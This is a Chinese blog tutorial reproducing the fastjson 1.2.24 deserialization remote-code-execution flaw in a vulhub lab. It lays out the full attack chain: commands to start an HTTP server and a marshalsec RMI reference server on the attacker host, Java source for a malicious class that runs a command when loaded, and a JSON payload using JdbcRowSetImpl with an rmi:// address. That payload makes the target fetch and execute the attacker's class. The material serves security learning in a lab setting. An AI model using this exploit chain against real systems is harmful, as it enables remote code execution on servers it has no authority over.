fastjson 1.2.24漏洞复现

最新推荐文章于 2024-04-23 10:29:35 发布
最新推荐文章于 2024-04-23 10:29:35 发布
阅读量835 收藏 4
点赞数 1
分类专栏: 渗透测试 文章标签: 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_18831583/article/details/128671551
版权

原理

fastjson由于没有对@type进行安全性验证,使攻击者传入危险的类,通过rmi服务指定的攻击机上的恶意class文件,导致命令执行。

版本

1.2.24

环境准备

靶机:ubuntu,192.168.52.129

攻击机:kali,192.168.52.128

复现步骤:

1、靶机下载启动漏洞环境

git clone https://github.com/vulhub/vulhub.git        

cd vulhub/fastjson/1.2.24-rce        进入vulhub目录

docker-compose up -d                 启动漏洞环境

此时能够访问192.168.52.129:8090

2、攻击机利用python快速开启http服务

python -m http.server 80 

3、攻击机编译并开启RMI服务

下载marshalsec:
git clone https://github.com/mbechler/marshalsec.git
安装maven:
apt-get install maven

使用maven编译marshalsec成jar包,先进入下载的marshalsec文件中:

mvn clean package -DskipTests

启动一个RMI服务器,设置监听端口

java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer "http://192.168.52.128/#lzy" 9999

注意文件名前的#

4、制作恶意class文件

import java.lang.Runtime;
import java.lang.Process;

public class test {
    static {
        try {
            Runtime rt = Runtime.getRuntime();
            String[] commands = {"ping", "-c", "pdbe23.dnslog.cn"};
            Process pc = rt.exec(commands);
            pc.waitFor();
        } catch (Exception e) {
            // do nothing
        }
    }
}

编译成class

javac lzy.java

此时生成了lzy.class文件

5、bp抓包

把GET修改成POST,添加POC

{
"b":{
          "@type":"com.sun.rowset.JdbcRowSetImpl",
          "dataSourceName":"rmi://192.168.52.128:9999/lzy",
          "autoCommit":true
    }
}

 查看dnslog,复现成功

 

Fresh-eyes
关注
  • 1
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Fastjson 1.2.24反序列化漏洞复现
m0_54899775的博客
01-16 4483
Fastjson 1.2.24反序列化漏洞复现 创建文件,反弹shell
Fastjson1.2.24-RCE 漏洞复现(CVE-2017-18349)
oiadkt的博客
04-12 1033
Fastjson1.2.24-RCE 漏洞复现(CVE-2017-18349)
Fastjson 1.2.24 反序列化漏洞复现
huangyongkang666的博客
04-15 3741
fastjson 1.2.24 反序列化漏洞复现 1.漏洞介绍 FastjsonEngine是其中的一个JSON处理引擎。Fastjson是其中的一个基于Java的JSON解析器/生成器。 Pippo 1.11.0版本中的FastjsonEngine所使用的Fastjson 1.2.25之前版本的parseObject存在安全漏洞。利用fastjson autotype在处理json对象时,未对@type字段进行安全安全性验证,攻击者可以传入危险类,并调用危险类连接远程RMI主机,通过其中的恶意类执行代码
Fastjson反序列化漏洞原理与漏洞复现(基于vulhub,保姆级的详细教程)
小司机的奥拓
04-23 2281
复现的过程中我也出现了许多的问题,最后发送bp改过的数据包之后,一直无法获取shell,也无法创建文件。后来发现是java和javac的版本问题,一定要保证二者都是1.8的版本!其他fastjson漏洞原理相似,只不过是增加了一下黑白名单的过滤,也存在对应的绕过方法,大家可以CSDN上再搜一搜,有很多相关文章。
【vulhub漏洞复现Fastjson 1.2.24反序列化漏洞
RexHa的博客
03-06 3678
Fastjson 是一个 Java 库,可以将 Java 对象转换为 JSON 格式,也可以将 JSON 字符串转换为 Java 对象。 漏洞成因: 目标网站在解析 json 时,未对 json 内容进行验证,直接将 json 解析成 java 对象并执行,攻击者构造对应的 payload ,让系统执行,就能达到代码执行,甚至命令执行的目的。
fastjson-1.2.24漏洞,搭建及复现,手把手图文教程
芜湖~米汤来喽~
10-04 1408
【代码】fastjson-1.2.24漏洞,搭建及复现,手把手图文教程。
FastJson1.2.24漏洞复现(详细步骤)
qq_35713681的博客
07-28 377
此测试用的是VM搭的Kali 2023.2。
fastjson1.2.24反序列化RCE
最新发布
06-24
**Fastjson 1.2.24 反序列化远程代码执行漏洞详解** 在Java开发中,Fastjson是一个广泛使用的高性能JSON库,它提供了一种快速解析和生成JSON的机制。然而,像许多处理序列化和反序列化的库一样,Fastjson在某些版本...
fastjson1.2.24含源码
02-04
《深入解析Fastjson 1.2.24Fastjson是阿里巴巴开发的一款高性能的Java JSON库,它具有极快的性能,广泛的功能以及简洁易用的API,使其在Java社区中广受欢迎。Fastjson 1.2.24版本是其发展过程中的一个重要里程碑...
fastjson-1.2.24.jar
02-24
java运行依赖jar包
【网路安全---漏洞复现Fastjson 1.2.24 命令执行漏洞复现-JNDI简单实现反弹shell(CVE-2017-18349)
m0_67844671的博客
09-27 1685
fastjson是阿里巴巴的开源JSON解析库,它可以解析JSON格式的字符串,支持将Java Bean序列化为JSON字符串,也可以从JSON字符串反序列化到JavaBean。即fastjson的主要功能就是将Java Bean序列化成JSON字符串,这样得到字符串之后就可以通过数据库等方式进行持久化了。看了很多别人关于漏洞复现过程,很多博客过程简洁,有的过程过于复杂,比如看到写java代码,用javac进行编译等等。所以我想写出比较详细的漏洞复现过程。
Fastjson 1.2.24 命令执行漏洞复现-JNDI简单实现反弹shell
面向感觉挖洞,背向对象编程。欢迎关注VX公众号:EureKa安全团队
03-08 2537
Fastjson 1.2.24 命令执行漏洞复现-JNDI简单实现反弹shell,不拖泥带水,最简单的办法实现反弹shell与命令执行。
【超详细】Fastjson1.2.24反序列化漏洞复现
SuPejkj的博客
10-20 3335
0x01 前言 Fastjson 是一个 Java 库,可以将 Java 对象转换为 JSON 格式,当然它也可以将 JSON 字符串转换为 Java 对象。 Fastjson 可以操作任何 Java 对象,即使是一些预先存在的没有源码的对象。 Fastjson 特性: 提供服务器端、安卓客户端两种解析工具,性能表现较好。 提供了 toJSONString() 和 parseObject() 方法来将 Java 对象与 JSON 相互转换。调用toJSONString方 法即可将对象转换成 JSON 字符.
Fastjson 1.2.24漏洞搭建及复现——详解
网安小白的博客
08-02 898
反序列化Fastjson1.2.24漏洞复现全过程,图文详解,包含复现过程中出现各种问题~
漏洞复现fastjson_1.2.24_unserializer_rce
过期的秋刀鱼
11-04 297
FastJson是Alibaba的一款开源Json解析库,可用于将Java对象转换为其Json表示形式,也可以用于将Json字符串转换为等效的Java对象。RCE漏洞的源头:17年FastJson爆出的1.2.24反序列化漏洞。关于FastJson1.2.24反序列化漏洞,简单来说,就是FastJson通过parseObject/parse将传入的字符串反序列化为Java对象时由于没有进行合理检查而导致的。发送POC到FastJson服务器,通过RMI协议远程加载恶意类。
【渗透测试漏洞复现fastjson1.2.24漏洞复现详细过程
GX233的博客
04-18 6510
fastjson1.2.24 RCE详细复现
fastjson1.2.24漏洞复现
07-27
对于Fastjson 1.2.24版本的漏洞复现,根据引用\[1\]和引用\[2\]的信息,该版本存在安全漏洞,攻击者可以利用fastjson autotype在处理json对象时,未对@type字段进行安全性验证,从而执行恶意代码。为了修复这个漏洞,建议升级到最新版本1.2.83safeMode加固,或者升级至Fastjson v2。\[3\]因此,如果你想复现Fastjson 1.2.24版本的漏洞,我建议你不要这样做,而是采取相应的安全措施来保护你的系统。 #### 引用[.reference_title] - *1* [FastJson1.2.24反序列化导致任意命令执行漏洞复现(CVE-2017-18349)](https://blog.csdn.net/q943111495/article/details/121031753)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^insertT0,239^v3^insert_chatgpt"}} ] [.reference_item] - *2* *3* [Fastjson1.2.24-RCE 漏洞复现(CVE-2017-18349)](https://blog.csdn.net/oiadkt/article/details/130103907)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^insertT0,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值